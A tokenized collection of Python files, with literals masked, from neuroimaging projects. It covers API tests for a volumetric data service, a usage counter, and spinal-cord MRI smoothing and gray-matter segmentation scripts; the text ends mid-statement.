assert ( proj_info [ '<STR_LIT>' ] [ '<STR_LIT:name>' ] == p . token ) <EOL> assert ( proj_info [ '<STR_LIT>' ] [ '<STR_LIT>' ] [ '<STR_LIT:0>' ] == [ <NUM_LIT> , <NUM_LIT> , <NUM_LIT:1000> ] ) <EOL> assert ( proj_info [ '<STR_LIT>' ] [ '<STR_LIT>' ] [ '<STR_LIT:0>' ] == [ <NUM_LIT> , <NUM_LIT> , <NUM_LIT:16> ] ) <EOL> assert ( proj_info [ '<STR_LIT>' ] [ '<STR_LIT>' ] == <NUM_LIT:5> ) <EOL> assert ( proj_info [ '<STR_LIT>' ] [ p . channels [ <NUM_LIT:0> ] ] [ '<STR_LIT>' ] == <NUM_LIT:0> ) <EOL> assert ( proj_info [ '<STR_LIT>' ] [ p . channels [ <NUM_LIT:0> ] ] [ '<STR_LIT>' ] == p . channel_type ) <EOL> assert ( proj_info [ '<STR_LIT>' ] [ p . channels [ <NUM_LIT:1> ] ] [ '<STR_LIT>' ] == p . datatype ) <EOL> p . args = ( <NUM_LIT:1000> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT:200> , <NUM_LIT> ) <EOL> image_data = np . ones ( [ <NUM_LIT:2> , <NUM_LIT:1> , <NUM_LIT:100> , <NUM_LIT:100> ] , dtype = np . uint8 ) * random . randint ( <NUM_LIT:0> , <NUM_LIT:255> ) <EOL> response = postNPZ ( p , image_data ) <EOL> voxarray = getNPZ ( p ) <EOL> assert ( np . array_equal ( image_data , voxarray ) ) <EOL> def test_error_json ( self ) : <EOL> """<STR_LIT>""" <EOL> dataset = ( p . dataset , [ <NUM_LIT:1000> , <NUM_LIT> , <NUM_LIT:1000> ] , [ <NUM_LIT:1.0> , <NUM_LIT:1.0> , <NUM_LIT> ] , [ <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> ] , None , None , None ) <EOL> project = ( p . token , None , None ) <EOL> channels = { p . channels [ <NUM_LIT:1> ] : ( p . channels [ <NUM_LIT:1> ] , p . datatype , p . channel_type , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , None , None , None , None ) } <EOL> json_file = tempfile . NamedTemporaryFile ( mode = '<STR_LIT>' ) <EOL> json_file . write ( createJson ( dataset , project , channels , channel_only = True ) ) <EOL> json_file . seek ( <NUM_LIT:0> ) <EOL> response = json . loads ( postURL ( "<STR_LIT>" . format ( SITE_HOST , p . token ) , json_file ) . read ( ) ) <EOL> assert ( '<STR_LIT>' == response ) <EOL> class Test_Delete_Channel_Json ( ) : <EOL> def setup_class ( self ) : <EOL> """<STR_LIT>""" <EOL> makeunitdb . createTestDB ( p . token , channel_list = p . channels , channel_type = p . channel_type , channel_datatype = p . datatype ) <EOL> def teardown_class ( self ) : <EOL> """<STR_LIT>""" <EOL> makeunitdb . deleteTestDB ( p . token ) <EOL> def test_single_channel_json ( self ) : <EOL> """<STR_LIT>""" <EOL> ocp_dict = { '<STR_LIT>' : ( p . channels [ <NUM_LIT:1> ] , ) } <EOL> json_file = tempfile . NamedTemporaryFile ( mode = '<STR_LIT>' ) <EOL> json_file . write ( json . dumps ( ocp_dict , sort_keys = True , indent = <NUM_LIT:4> ) ) <EOL> json_file . seek ( <NUM_LIT:0> ) <EOL> response = json . loads ( postURL ( "<STR_LIT>" . format ( SITE_HOST , p . token ) , json_file ) . read ( ) ) <EOL> assert ( '<STR_LIT>' == response ) <EOL> f = getURL ( "<STR_LIT>" . format ( SITE_HOST , p . token ) ) <EOL> proj_info = json . loads ( f . read ( ) ) <EOL> assert ( proj_info [ '<STR_LIT>' ] [ '<STR_LIT:name>' ] == p . token ) <EOL> assert ( proj_info [ '<STR_LIT>' ] [ p . channels [ <NUM_LIT:0> ] ] [ '<STR_LIT>' ] == <NUM_LIT:0> ) </s>
<s> import urllib2 <EOL> token = '<STR_LIT>' <EOL> channel = '<STR_LIT>' <EOL> graphtype = '<STR_LIT>' <EOL> url = '<STR_LIT>' . format ( '<STR_LIT>' , token , channel , graphtype ) <EOL> try : <EOL> req = urllib2 . Request ( url ) <EOL> resposne = urllib2 . urlopen ( req ) <EOL> except Exception , e : <EOL> raise </s>
<s> import json <EOL> import os <EOL> DEFAULT_JSON_OUTPUT = '<STR_LIT>' <EOL> class GlobalCounter : <EOL> def __init__ ( self ) : <EOL> self . data = { } <EOL> @ staticmethod <EOL> def fqn ( class_name , method , lineno ) : <EOL> name = method + '<STR_LIT::>' + str ( lineno ) <EOL> if class_name and class_name != '<STR_LIT:None>' : <EOL> name = class_name + '<STR_LIT>' + name <EOL> return name <EOL> def count ( self , file , class_name = None , method = None , lineno = - <NUM_LIT:1> ) : <EOL> if file not in self . data : <EOL> self . data [ file ] = { } <EOL> d = self . data [ file ] <EOL> name = GlobalCounter . fqn ( class_name , method , lineno ) <EOL> if name not in d : <EOL> d [ name ] = <NUM_LIT:0> <EOL> d [ name ] += <NUM_LIT:1> <EOL> def to_json ( self , file_location = DEFAULT_JSON_OUTPUT ) : <EOL> print "<STR_LIT>" % file_location <EOL> try : <EOL> fd = open ( file_location , '<STR_LIT:w>' ) <EOL> json . dump ( self . data , fd , indent = <NUM_LIT:2> , sort_keys = True ) <EOL> fd . close ( ) <EOL> except Exception , ex : <EOL> print "<STR_LIT>" , str ( ex ) <EOL> GlobalCounterInst = GlobalCounter ( ) </s>
<s> from generate_phantom import get_tracts , save_3D_nparray_niftii <EOL> from numpy import zeros , empty <EOL> tracts_to_sum_index = <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:3> , <NUM_LIT:4> , <NUM_LIT:5> , <NUM_LIT:6> , <NUM_LIT:7> , <NUM_LIT:8> , <NUM_LIT:9> , <NUM_LIT:10> , <NUM_LIT:11> , <NUM_LIT:12> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT:15> , <NUM_LIT:16> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT:20> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> <EOL> folder_atlas = "<STR_LIT>" <EOL> tracts_sum_img = "<STR_LIT>" <EOL> def main ( ) : <EOL> tracts = get_tracts ( folder_atlas ) <EOL> tracts_sum = add_tracts ( tracts , tracts_to_sum_index ) <EOL> save_3D_nparray_niftii ( tracts_sum , tracts_sum_img ) <EOL> def add_tracts ( tracts , tracts_to_sum_index ) : <EOL> tracts_sum = empty ( ( tracts [ <NUM_LIT:0> , <NUM_LIT:0> ] ) . shape ) <EOL> for i in tracts_to_sum_index : <EOL> tracts_sum = tracts_sum + tracts [ i , <NUM_LIT:0> ] <EOL> return tracts_sum <EOL> if __name__ == "<STR_LIT:__main__>" : <EOL> main ( ) </s>
<s> import splines_approximation_v2 as spline <EOL> import glob <EOL> import commands <EOL> import sct_utils <EOL> def main ( ) : <EOL> i = <NUM_LIT> <EOL> b = [ <NUM_LIT:5> , <NUM_LIT:7> , <NUM_LIT:9> , <NUM_LIT:11> , <NUM_LIT> , <NUM_LIT:15> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ] <EOL> for file in glob . glob ( '<STR_LIT>' ) : <EOL> path , file_name , ext_fname = sct_utils . extract_fname ( file ) <EOL> cmd1 = '<STR_LIT>' + file_name <EOL> print cmd1 <EOL> status , output = commands . getstatusoutput ( cmd1 ) <EOL> print status , output <EOL> for bc in b : <EOL> spline . main ( file , bc ) <EOL> if __name__ == "<STR_LIT:__main__>" : <EOL> main ( ) </s>
<s> import os <EOL> import getopt <EOL> import sys <EOL> import sct_utils as sct <EOL> import scipy . ndimage <EOL> try : <EOL> import nibabel <EOL> except ImportError : <EOL> print '<STR_LIT>' <EOL> sys . exit ( <NUM_LIT:2> ) <EOL> try : <EOL> import numpy as np <EOL> except ImportError : <EOL> print '<STR_LIT>' <EOL> sys . exit ( <NUM_LIT:2> ) <EOL> def main ( ) : <EOL> strategy = "<STR_LIT>" <EOL> fname_centerline = "<STR_LIT>" <EOL> fname_input_image = "<STR_LIT>" <EOL> fname_output_image = "<STR_LIT>" <EOL> fname_mask = "<STR_LIT>" <EOL> path_script = os . path . dirname ( __file__ ) + '<STR_LIT:/>' <EOL> try : <EOL> opts , args = getopt . getopt ( sys . argv [ <NUM_LIT:1> : ] , '<STR_LIT>' ) <EOL> except getopt . GetoptError as err : <EOL> print str ( err ) <EOL> usage ( ) <EOL> for opt , arg in opts : <EOL> if opt == '<STR_LIT>' : <EOL> usage ( ) <EOL> elif opt in ( '<STR_LIT>' ) : <EOL> fname_input_image = arg <EOL> elif opt in ( '<STR_LIT>' ) : <EOL> fname_output_image = arg <EOL> elif opt in ( '<STR_LIT>' ) : <EOL> fname_mask = arg <EOL> elif opt in ( '<STR_LIT>' ) : <EOL> filter_type = str ( arg ) <EOL> elif opt in ( '<STR_LIT>' ) : <EOL> strategy = str ( arg ) <EOL> elif opt in ( '<STR_LIT:-c>' ) : <EOL> fname_centerline = arg <EOL> if fname_input_image == '<STR_LIT>' or fname_mask == '<STR_LIT>' or ( strategy == "<STR_LIT>" and fname_centerline == "<STR_LIT>" ) : <EOL> print ( "<STR_LIT>" ) <EOL> usage ( ) <EOL> sct . check_file_exist ( fname_input_image ) <EOL> sct . check_file_exist ( fname_mask ) <EOL> if strategy == "<STR_LIT>" : <EOL> sct . check_file_exist ( fname_centerline ) <EOL> path_input_image , file_input_image , ext_input_image = sct . extract_fname ( fname_input_image ) <EOL> path_output_image , file_output_image , ext_output_image = sct . extract_fname ( fname_output_image ) <EOL> img = nibabel . load ( fname_input_image ) <EOL> data = img . get_data ( ) <EOL> hdr = img . get_header ( ) <EOL> mask = nibabel . load ( fname_mask ) <EOL> mask_data = mask . get_data ( ) <EOL> mask_hdr = mask . get_header ( ) <EOL> if strategy == "<STR_LIT>" : <EOL> print ( "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> data = smooth_mean_per_slice ( data , mask_data ) <EOL> elif strategy == "<STR_LIT>" : <EOL> print ( "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> data = smooth_along_centerline ( data , fname_input_image , file_input_image , ext_input_image , mask_data , <EOL> fname_centerline ) <EOL> elif strategy == "<STR_LIT>" or "<STR_LIT>" : <EOL> print ( "<STR_LIT>" ) <EOL> data = smooth_total ( data , mask_data ) <EOL> else : <EOL> print ( "<STR_LIT>" ) <EOL> usage ( ) <EOL> hdr . set_data_dtype ( '<STR_LIT>' ) <EOL> print '<STR_LIT>' <EOL> img = nibabel . Nifti1Image ( data , None , hdr ) <EOL> nibabel . save ( img , '<STR_LIT>' + file_output_image + '<STR_LIT>' ) <EOL> sct . generate_output_file ( '<STR_LIT>' + file_output_image + '<STR_LIT>' , '<STR_LIT>' , file_output_image , ext_output_image ) <EOL> def apply_filter ( data , filter_type = '<STR_LIT>' ) : <EOL> """<STR_LIT>""" <EOL> if filter_type == '<STR_LIT>' : <EOL> print '<STR_LIT>' <EOL> sigma = <NUM_LIT:1> <EOL> data_filtered = scipy . ndimage . filters . gaussian_filter ( data , sigma ) <EOL> return data_filtered <EOL> def smooth_mean_per_slice ( data , mask_data ) : <EOL> """<STR_LIT>""" <EOL> X , Y , Z = ( mask_data > <NUM_LIT:0> ) . nonzero ( ) <EOL> N = len ( X ) <EOL> Z_min = min ( Z ) <EOL> Z_max = max ( Z ) <EOL> Z_nb = Z_max - Z_min + <NUM_LIT:1> <EOL> x = len ( data ) <EOL> y = len ( data [ <NUM_LIT:1> ] ) <EOL> z = len ( data [ <NUM_LIT:1> ] [ <NUM_LIT:1> ] ) <EOL> sc_values = [ [ ] for Z_index in range ( <NUM_LIT:0> , Z_nb ) ] <EOL> for vox_index in range ( <NUM_LIT:0> , N ) : <EOL> sc_values [ Z [ vox_index ] - Z_min ] . append ( data [ X [ vox_index ] ] [ Y [ vox_index ] ] [ Z [ vox_index ] ] ) <EOL> print '<STR_LIT>' <EOL> sc_mean_per_slice = [ <NUM_LIT:0> for Z_index in range ( <NUM_LIT:0> , Z_nb ) ] <EOL> for Z_index in range ( <NUM_LIT:0> , Z_nb ) : <EOL> sc_mean_per_slice [ Z_index ] = sum ( sc_values [ Z_index ] ) / len ( sc_values [ Z_index ] ) <EOL> print '<STR_LIT>' <EOL> sc_data = [ [ [ <NUM_LIT:0> for k in range ( <NUM_LIT:0> , z ) ] for j in range ( <NUM_LIT:0> , y ) ] for i in <EOL> range ( <NUM_LIT:0> , x ) ] <EOL> for k in range ( <NUM_LIT:0> , z ) : <EOL> for j in range ( <NUM_LIT:0> , y ) : <EOL> for i in range ( <NUM_LIT:0> , x ) : <EOL> if k < Z_min : <EOL> sc_data [ i ] [ j ] [ k ] = sc_mean_per_slice [ <NUM_LIT:0> ] <EOL> elif Z_min <= k <= Z_max : <EOL> sc_data [ i ] [ j ] [ k ] = sc_mean_per_slice [ k - Z_min ] <EOL> elif k > Z_max : <EOL> sc_data [ i ] [ j ] [ k ] = sc_mean_per_slice [ len ( sc_mean_per_slice ) - <NUM_LIT:1> ] <EOL> for i in range ( <NUM_LIT:0> , N ) : <EOL> sc_data [ X [ i ] ] [ Y [ i ] ] [ Z [ i ] ] = data [ X [ i ] ] [ Y [ i ] ] [ Z [ i ] ] <EOL> smoothed_sc_data = apply_filter ( sc_data ) <EOL> for i in range ( <NUM_LIT:0> , N ) : <EOL> data [ X [ i ] ] [ Y [ i ] ] [ Z [ i ] ] = smoothed_sc_data [ X [ i ] ] [ Y [ i ] ] [ Z [ i ] ] <EOL> return data <EOL> def smooth_total ( data , mask_data ) : <EOL> """<STR_LIT>""" <EOL> X , Y , Z = ( mask_data > <NUM_LIT:0> ) . nonzero ( ) <EOL> N = len ( X ) <EOL> smoothed_sc_data = apply_filter ( data ) <EOL> for i in range ( <NUM_LIT:0> , N ) : <EOL> data [ X [ i ] ] [ Y [ i ] ] [ Z [ i ] ] = smoothed_sc_data [ X [ i ] ] [ Y [ i ] ] [ Z [ i ] ] <EOL> return data <EOL> def smooth_along_centerline ( data , fname_input_image , file_input_image , ext_input_image , mask_data , fname_centerline ) : <EOL> """<STR_LIT>""" <EOL> X , Y , Z = ( mask_data > <NUM_LIT:0> ) . nonzero ( ) <EOL> N = len ( X ) <EOL> print ( "<STR_LIT>" ) <EOL> os . system ( "<STR_LIT>" + str ( fname_input_image ) + "<STR_LIT>" + str ( fname_centerline ) ) <EOL> print ( "<STR_LIT>" + "<STR_LIT>" + str ( file_input_image ) + "<STR_LIT>" + str ( ext_input_image ) + "<STR_LIT>" ) <EOL> smoothed_img = nibabel . load ( "<STR_LIT>" + str ( file_input_image ) + "<STR_LIT>" + str ( ext_input_image ) ) <EOL> smoothed_sc_data = smoothed_img . get_data ( ) <EOL> for i in range ( <NUM_LIT:0> , N ) : <EOL> data [ X [ i ] ] [ Y [ i ] ] [ Z [ i ] ] = smoothed_sc_data [ X [ i ] ] [ Y [ i ] ] [ Z [ i ] ] <EOL> return data <EOL> def usage ( ) : <EOL> print '<STR_LIT>' '<STR_LIT>' '<STR_LIT:\n>' '<STR_LIT>' '<STR_LIT>' '<STR_LIT>' '<STR_LIT>' '<STR_LIT:\n>' '<STR_LIT>' '<STR_LIT>' '<STR_LIT>' '<STR_LIT>' '<STR_LIT>' '<STR_LIT>' '<STR_LIT:\n>' '<STR_LIT:\n>' '<STR_LIT>' '<STR_LIT>' <EOL> sys . exit ( <NUM_LIT:2> ) <EOL> if __name__ == "<STR_LIT:__main__>" : <EOL> main ( ) </s>
<s> from msct_pca import PCA <EOL> from msct_gmseg_utils import * <EOL> import sct_utils as sct <EOL> import pickle <EOL> from math import sqrt <EOL> from math import exp <EOL> class Param : <EOL> def __init__ ( self ) : <EOL> self . debug = <NUM_LIT:0> <EOL> self . path_dictionary = None <EOL> self . todo_model = None <EOL> self . model_dir = '<STR_LIT>' <EOL> self . reg = [ '<STR_LIT>' ] <EOL> self . reg_metric = '<STR_LIT>' <EOL> self . target_denoising = True <EOL> self . first_reg = False <EOL> self . use_levels = True <EOL> self . weight_gamma = <NUM_LIT> <EOL> self . equation_id = <NUM_LIT:1> <EOL> self . weight_label_fusion = False <EOL> self . mode_weight_similarity = False <EOL> self . z_regularisation = False <EOL> self . res_type = '<STR_LIT>' <EOL> self . verbose = <NUM_LIT:1> <EOL> def __repr__ ( self ) : <EOL> s = '<STR_LIT>' <EOL> s += '<STR_LIT>' + str ( self . path_dictionary ) + '<STR_LIT:\n>' <EOL> s += '<STR_LIT>' + str ( self . todo_model ) + '<STR_LIT:\n>' <EOL> s += '<STR_LIT>' + str ( self . model_dir ) + '<STR_LIT:\n>' <EOL> s += '<STR_LIT>' + str ( self . reg ) + '<STR_LIT:\n>' <EOL> s += '<STR_LIT>' + str ( self . reg_metric ) + '<STR_LIT:\n>' <EOL> s += '<STR_LIT>' + str ( self . target_denoising ) + '<STR_LIT>' <EOL> s += '<STR_LIT>' + str ( self . first_reg ) + '<STR_LIT:\n>' <EOL> s += '<STR_LIT>' + str ( self . use_levels ) + '<STR_LIT:\n>' <EOL> s += '<STR_LIT>' + str ( self . weight_gamma ) + '<STR_LIT:\n>' <EOL> s += '<STR_LIT>' + str ( self . equation_id ) + '<STR_LIT:\n>' <EOL> s += '<STR_LIT>' + str ( self . weight_label_fusion ) + '<STR_LIT:\n>' <EOL> s += '<STR_LIT>' + str ( self . mode_weight_similarity ) + '<STR_LIT:\n>' <EOL> s += '<STR_LIT>' + str ( self . z_regularisation ) + '<STR_LIT:\n>' <EOL> s += '<STR_LIT>' + str ( self . res_type ) + '<STR_LIT:\n>' <EOL> s += '<STR_LIT>' + str ( self . verbose ) + '<STR_LIT:\n>' <EOL> return s <EOL> class ModelDictionary : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , dic_param = None ) : <EOL> """<STR_LIT>""" <EOL> if dic_param is None : <EOL> self . param = Param ( ) <EOL> else : <EOL> self . param = dic_param <EOL> self . level_label = { <NUM_LIT:0> : '<STR_LIT>' , <NUM_LIT:1> : '<STR_LIT>' , <NUM_LIT:2> : '<STR_LIT>' , <NUM_LIT:3> : '<STR_LIT>' , <NUM_LIT:4> : '<STR_LIT>' , <NUM_LIT:5> : '<STR_LIT>' , <NUM_LIT:6> : '<STR_LIT>' , <NUM_LIT:7> : '<STR_LIT>' , <NUM_LIT:8> : '<STR_LIT>' , <NUM_LIT:9> : '<STR_LIT>' , <NUM_LIT:10> : '<STR_LIT>' , <NUM_LIT:11> : '<STR_LIT>' , <NUM_LIT:12> : '<STR_LIT>' , <NUM_LIT> : '<STR_LIT>' } <EOL> self . coregistration_transfos = None <EOL> self . slices = None <EOL> self . J = None <EOL> self . N = None <EOL> self . mean_seg = None <EOL> self . mean_image = None <EOL> self . coregistration_transfos = self . param . reg <EOL> if self . param . todo_model == '<STR_LIT>' : <EOL> self . compute_model ( ) <EOL> elif self . param . todo_model == '<STR_LIT>' : <EOL> self . load_model ( ) <EOL> def compute_model ( self ) : <EOL> sct . printv ( '<STR_LIT>' , self . param . verbose , '<STR_LIT>' ) <EOL> sct . run ( '<STR_LIT>' + self . param . model_dir ) <EOL> param_fic = open ( self . param . model_dir + '<STR_LIT>' , '<STR_LIT:w>' ) <EOL> param_fic . write ( str ( self . param ) ) <EOL> param_fic . close ( ) <EOL> sct . printv ( '<STR_LIT>' , self . param . verbose , '<STR_LIT>' ) <EOL> self . slices = self . load_data_dictionary ( ) <EOL> self . J = len ( [ dic_slice . im for dic_slice in self . slices ] ) <EOL> self . N = len ( self . slices [ <NUM_LIT:0> ] . im . flatten ( ) ) <EOL> self . invert_seg ( ) <EOL> sct . printv ( '<STR_LIT>' , self . param . verbose , '<STR_LIT>' ) <EOL> self . mean_seg = self . seg_coregistration ( transfo_to_apply = self . coregistration_transfos ) <EOL> sct . printv ( '<STR_LIT>' , self . param . verbose , '<STR_LIT>' ) <EOL> self . coregister_data ( transfo_to_apply = self . coregistration_transfos ) <EOL> self . mean_image = self . compute_mean_dic_image ( np . asarray ( [ dic_slice . im_M for dic_slice in self . slices ] ) ) <EOL> self . save_model ( ) <EOL> def load_data_dictionary ( self ) : <EOL> """<STR_LIT>""" <EOL> slices = [ ] <EOL> j = <NUM_LIT:0> <EOL> for subject_dir in os . listdir ( self . param . path_dictionary ) : <EOL> subject_path = self . param . path_dictionary + '<STR_LIT:/>' + subject_dir <EOL> if os . path . isdir ( subject_path ) : <EOL> for file_name in os . listdir ( subject_path ) : <EOL> if '<STR_LIT>' in file_name : <EOL> slice_level = <NUM_LIT:0> <EOL> name_list = file_name . split ( '<STR_LIT:_>' ) <EOL> for word in name_list : <EOL> if word . upper ( ) in self . level_label . values ( ) : <EOL> slice_level = get_key_from_val ( self . level_label , word . upper ( ) ) <EOL> slices . append ( Slice ( slice_id = j , im = Image ( subject_path + '<STR_LIT:/>' + file_name ) . data , level = slice_level , reg_to_m = [ ] ) ) <EOL> seg_file = sct . extract_fname ( file_name ) [ <NUM_LIT:1> ] [ : - <NUM_LIT:3> ] + '<STR_LIT>' <EOL> slices [ j ] . set ( gm_seg = Image ( subject_path + '<STR_LIT:/>' + seg_file ) . data ) <EOL> j += <NUM_LIT:1> <EOL> return np . asarray ( slices ) <EOL> def invert_seg ( self ) : <EOL> """<STR_LIT>""" <EOL> for dic_slice in self . slices : <EOL> im_dic = Image ( param = dic_slice . im ) <EOL> sc = im_dic . copy ( ) <EOL> nz_coord_sc = sc . getNonZeroCoordinates ( ) <EOL> im_seg = Image ( param = dic_slice . gm_seg ) <EOL> '''<STR_LIT>''' <EOL> inverted_slice_decision = inverse_gmseg_to_wmseg ( im_seg , im_dic , save = False ) <EOL> dic_slice . set ( wm_seg = inverted_slice_decision . data ) <EOL> def seg_coregistration ( self , transfo_to_apply = None ) : <EOL> """<STR_LIT>""" <EOL> current_mean_seg = compute_majority_vote_mean_seg ( np . asarray ( [ dic_slice . wm_seg for dic_slice in self . slices ] ) ) <EOL> first = True <EOL> for transfo in transfo_to_apply : <EOL> sct . printv ( '<STR_LIT>' + transfo + '<STR_LIT>' , self . param . verbose , '<STR_LIT>' ) <EOL> current_mean_seg = self . find_coregistration ( mean_seg = current_mean_seg , transfo_type = transfo , first = first ) <EOL> first = False <EOL> resulting_mean_seg = current_mean_seg <EOL> return resulting_mean_seg <EOL> def find_coregistration ( self , mean_seg = None , transfo_type = '<STR_LIT>' , first = True ) : <EOL> """<STR_LIT>""" <EOL> for dic_slice in self . slices : <EOL> name_j_transform = '<STR_LIT>' + str ( dic_slice . id ) + find_ants_transfo_name ( transfo_type ) [ <NUM_LIT:0> ] <EOL> new_reg_list = dic_slice . reg_to_M . append ( name_j_transform ) <EOL> dic_slice . set ( reg_to_m = new_reg_list ) <EOL> if first : <EOL> seg_m = apply_ants_transfo ( mean_seg , dic_slice . wm_seg , transfo_name = name_j_transform , path = self . param . model_dir + '<STR_LIT:/>' , transfo_type = transfo_type , metric = self . param . reg_metric ) <EOL> else : <EOL> seg_m = apply_ants_transfo ( mean_seg , dic_slice . wm_seg_M , transfo_name = name_j_transform , path = self . param . model_dir + '<STR_LIT:/>' , transfo_type = transfo_type , metric = self . param . reg_metric ) <EOL> dic_slice . set ( wm_seg_m = seg_m . astype ( int ) ) <EOL> dic_slice . set ( wm_seg_m_flat = seg_m . flatten ( ) . astype ( int ) ) <EOL> mean_seg = compute_majority_vote_mean_seg ( [ dic_slice . wm_seg_M for dic_slice in self . slices ] ) <EOL> return mean_seg <EOL> def compute_mean_dic_image ( self , im_data_set ) : <EOL> """<STR_LIT>""" <EOL> mean = np . sum ( im_data_set , axis = <NUM_LIT:0> ) <EOL> mean /= float ( len ( im_data_set ) ) <EOL> return mean <EOL> def coregister_data ( self , transfo_to_apply = None ) : <EOL> """<STR_LIT>""" <EOL> list_im = [ dic_slice . im for dic_slice in self . slices ] <EOL> list_gm_seg = [ dic_slice . gm_seg for dic_slice in self . slices ] <EOL> for dic_slice in self . slices : <EOL> for n_transfo , transfo in enumerate ( transfo_to_apply ) : <EOL> im_m = apply_ants_transfo ( self . compute_mean_dic_image ( list_im ) , dic_slice . im , search_reg = False , transfo_name = dic_slice . reg_to_M [ n_transfo ] , binary = False , path = self . param . model_dir + '<STR_LIT:/>' , transfo_type = transfo , metric = self . param . reg_metric ) <EOL> gm_seg_m = apply_ants_transfo ( compute_majority_vote_mean_seg ( list_gm_seg ) , dic_slice . gm_seg , search_reg = False , transfo_name = dic_slice . reg_to_M [ n_transfo ] , binary = True , path = self . param . model_dir + '<STR_LIT:/>' , transfo_type = transfo , metric = self . param . reg_metric ) <EOL> dic_slice . set ( im_m = im_m ) <EOL> dic_slice . set ( gm_seg_m = gm_seg_m ) <EOL> dic_slice . set ( im_m_flat = im_m . flatten ( ) ) <EOL> for transfo_type in transfo_to_apply : <EOL> transfo_dir = transfo_type . lower ( ) + '<STR_LIT>' <EOL> if transfo_dir in os . listdir ( self . param . model_dir + '<STR_LIT:/>' ) : <EOL> sct . run ( '<STR_LIT>' + self . param . model_dir + '<STR_LIT:/>' + transfo_dir + '<STR_LIT:/>' ) <EOL> def save_model ( self ) : <EOL> model_slices = np . asarray ( [ ( dic_slice . im_M , dic_slice . wm_seg_M , dic_slice . gm_seg_M , dic_slice . level ) for dic_slice in self . slices ] ) <EOL> pickle . dump ( model_slices , open ( self . param . model_dir + '<STR_LIT>' , '<STR_LIT:wb>' ) , protocol = <NUM_LIT:2> ) <EOL> def load_model ( self ) : <EOL> model_slices = pickle . load ( open ( self . param . path_dictionary + '<STR_LIT>' , '<STR_LIT:rb>' ) ) <EOL> self . slices = [ Slice ( slice_id = i_slice , level = dic_slice [ <NUM_LIT:3> ] , im_m = dic_slice [ <NUM_LIT:0> ] , wm_seg_m = dic_slice [ <NUM_LIT:1> ] , gm_seg_m = dic_slice [ <NUM_LIT:2> ] , im_m_flat = dic_slice [ <NUM_LIT:0> ] . flatten ( ) , wm_seg_m_flat = dic_slice [ <NUM_LIT:1> ] . flatten ( ) ) for i_slice , dic_slice in enumerate ( model_slices ) ] <EOL> self . J = len ( [ dic_slice . im_M for dic_slice in self . slices ] ) <EOL> self . N = len ( self . slices [ <NUM_LIT:0> ] . im_M_flat ) <EOL> self . mean_seg = compute_majority_vote_mean_seg ( [ dic_slice . wm_seg_M for dic_slice in self . slices ] ) <EOL> def show_dictionary_data ( self ) : <EOL> """<STR_LIT>""" <EOL> for dic_slice in self . slices [ : <NUM_LIT:10> ] : <EOL> fig = plt . figure ( ) <EOL> if dic_slice . wm_seg is not None : <EOL> seg_subplot = fig . add_subplot ( <NUM_LIT:2> , <NUM_LIT:3> , <NUM_LIT:1> ) <EOL> seg_subplot . set_title ( '<STR_LIT>' ) <EOL> im_seg = seg_subplot . imshow ( dic_slice . wm_seg ) <EOL> im_seg . set_interpolation ( '<STR_LIT>' ) <EOL> im_seg . set_cmap ( '<STR_LIT>' ) <EOL> seg_m_subplot = fig . add_subplot ( <NUM_LIT:2> , <NUM_LIT:3> , <NUM_LIT:2> ) <EOL> seg_m_subplot . set_title ( '<STR_LIT>' ) <EOL> im_seg_m = seg_m_subplot . imshow ( dic_slice . wm_seg_M ) <EOL> im_seg_m . set_interpolation ( '<STR_LIT>' ) <EOL> im_seg_m . set_cmap ( '<STR_LIT>' ) <EOL> if self . mean_seg is not None : <EOL> mean_seg_subplot = fig . add_subplot ( <NUM_LIT:2> , <NUM_LIT:3> , <NUM_LIT:3> ) <EOL> mean_seg_subplot . set_title ( '<STR_LIT>' ) <EOL> im_mean_seg = mean_seg_subplot . imshow ( np . asarray ( self . mean_seg ) ) <EOL> im_mean_seg . set_interpolation ( '<STR_LIT>' ) <EOL> im_mean_seg . set_cmap ( '<STR_LIT>' ) <EOL> if dic_slice . im is not None : <EOL> slice_im_subplot = fig . add_subplot ( <NUM_LIT:2> , <NUM_LIT:3> , <NUM_LIT:4> ) <EOL> slice_im_subplot . set_title ( '<STR_LIT>' ) <EOL> im_slice_im = slice_im_subplot . imshow ( dic_slice . im ) <EOL> im_slice_im . set_interpolation ( '<STR_LIT>' ) <EOL> im_slice_im . set_cmap ( '<STR_LIT>' ) <EOL> slice_im_m_subplot = fig . add_subplot ( <NUM_LIT:2> , <NUM_LIT:3> , <NUM_LIT:5> ) <EOL> slice_im_m_subplot . set_title ( '<STR_LIT>' ) <EOL> im_slice_im_m = slice_im_m_subplot . imshow ( dic_slice . im_M ) <EOL> im_slice_im_m . set_interpolation ( '<STR_LIT>' ) <EOL> im_slice_im_m . set_cmap ( '<STR_LIT>' ) <EOL> plt . suptitle ( '<STR_LIT>' + str ( dic_slice . id ) ) <EOL> plt . show ( ) <EOL> class Model : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , model_param = None , k = <NUM_LIT> ) : <EOL> """<STR_LIT>""" <EOL> if model_param is None : <EOL> self . param = Param ( ) <EOL> else : <EOL> self . param = model_param <EOL> self . dictionary = ModelDictionary ( dic_param = self . param ) <EOL> sct . printv ( "<STR_LIT>" + str ( self . dictionary . N ) + "<STR_LIT:U+002C>" + str ( self . dictionary . J ) + "<STR_LIT:)>" , verbose = self . param . verbose ) <EOL> if self . param . todo_model == '<STR_LIT>' : <EOL> sct . printv ( '<STR_LIT>' , self . param . verbose , '<STR_LIT>' ) <EOL> self . pca = PCA ( np . asarray ( self . dictionary . slices ) , k = k ) <EOL> self . pca . save_data ( self . param . model_dir ) <EOL> elif self . param . todo_model == '<STR_LIT>' : <EOL> sct . printv ( '<STR_LIT>' , self . param . verbose , '<STR_LIT>' ) <EOL> pca_data = pickle . load ( open ( self . param . path_dictionary + '<STR_LIT>' , '<STR_LIT:rb>' ) ) <EOL> self . pca = PCA ( np . asarray ( self . dictionary . slices ) , mean_vect = 